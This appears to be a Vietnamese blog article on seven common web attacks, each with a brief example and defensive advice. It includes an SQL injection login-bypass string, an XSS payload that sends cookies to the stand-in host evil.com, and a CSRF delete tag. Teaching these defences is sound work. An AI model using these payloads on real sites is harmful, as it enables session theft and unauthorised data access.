1. SQL Injection: cũ nhưng chưa bao giờ chết
Chỉ cần một input không kiểm soát, kẻ tấn công có thể chèn câu lệnh SQL để đọc hoặc xóa dữ liệu.
Input: ' OR '1'='1
Query: SELECT * FROM users WHERE username = '' OR '1'='1' AND password='...';
Kết quả: truy vấn trả về toàn bộ user, bỏ qua kiểm tra mật khẩu. Năm 2025, nhiều website vẫn để lỗ hổng kiểu này trong form tìm kiếm hoặc API đăng nhập.
- Dùng prepared statement hoặc ORM an toàn.
- Chỉ query đúng field cần thiết, tránh SELECT *.
2. Cross-Site Scripting (XSS)
Hacker có thể chèn script vào comment, form hoặc URL để đánh cắp cookie, session.
<script>fetch('https://evil.com?c='+document.cookie)</script>
Nếu site render comment mà không escape, đoạn script trên sẽ gửi cookie của người dùng tới máy chủ của hacker.
- Escape output theo đúng ngữ cảnh (HTML, JS, URL).
- Triển khai CSP để giảm thiểu rủi ro.
3. Cross-Site Request Forgery (CSRF)
Người dùng đăng nhập admin, sau đó click vào link bẫy:
<img src="https://site.com/delete?id=123">
Nếu API không kiểm tra CSRF token, request này sẽ xóa dữ liệu bằng chính cookie hợp lệ của người dùng.
- Thêm CSRF token cho form và API quan trọng.
- Dùng SameSite cookie để giảm tấn công chéo nguồn.
4. Authentication & Session Hijacking
Nhiều website để cookie không có flag HttpOnly/Secure, dễ bị đánh cắp qua XSS hoặc sniffing trên mạng không mã hóa. Ví dụ:
Set-Cookie: sessionid=abc123
Nếu thiếu Secure và HttpOnly, cookie có thể bị lấy qua JavaScript hoặc khi user truy cập qua HTTP.
- Đặt HttpOnly, Secure, SameSite cho cookie.
- Bắt buộc mật khẩu mạnh, giới hạn số lần đăng nhập sai, bật 2FA.
5. API Insecurity
Nhiều API để public mà không cần xác thực. Ví dụ endpoint:
GET /api/v1/users
Trả về toàn bộ dữ liệu user chỉ vì thiếu auth middleware. Thậm chí hacker chỉ cần đọc file swagger.json là thấy hết danh sách endpoint.
- Xác thực mọi request, không phân biệt “internal” hay “public”.
- Giới hạn tốc độ (rate-limit) để chống brute force.
6. Supply Chain Attack
Cài một package hoặc plugin chưa được kiểm chứng có thể đưa mã độc vào site. Đã có trường hợp hacker upload package lên npm với tên gần giống thư viện nổi tiếng để lừa lập trình viên tải về.
npm install expresss
Chỉ sai một ký tự, nhưng package giả mạo có thể mở cửa sau (backdoor) cho hacker.
- Khóa phiên bản dependency, kiểm tra checksum trước khi deploy.
- Audit định kỳ plugin/theme đã cài đặt.
7. Misconfiguration Attack
Nhiều site để nguyên config mặc định như bật directory listing hoặc để lộ file debug.
http://site.com/wp-content/uploads/
Nếu server không chặn, toàn bộ danh sách file sẽ hiển thị cho bất kỳ ai.
- Tắt debug và xóa file test trước khi đưa lên production.
- Chặn truy cập trực tiếp thư mục nhạy cảm qua .htaccess hoặc Nginx.
Kết luận
Các kỹ thuật tấn công trên không mới, nhưng công cụ khai thác ngày càng mạnh mẽ và tự động hóa. Bảo mật web không phải chuyện cài thêm vài plugin, mà cần tư duy phòng thủ nhiều lớp: kiểm tra input, escape output, quản lý session, giám sát API và audit định kỳ. Bất kỳ hệ thống nào chủ quan với những lỗi cơ bản này đều có nguy cơ bị xâm nhập và mất dữ liệu.
Bình luận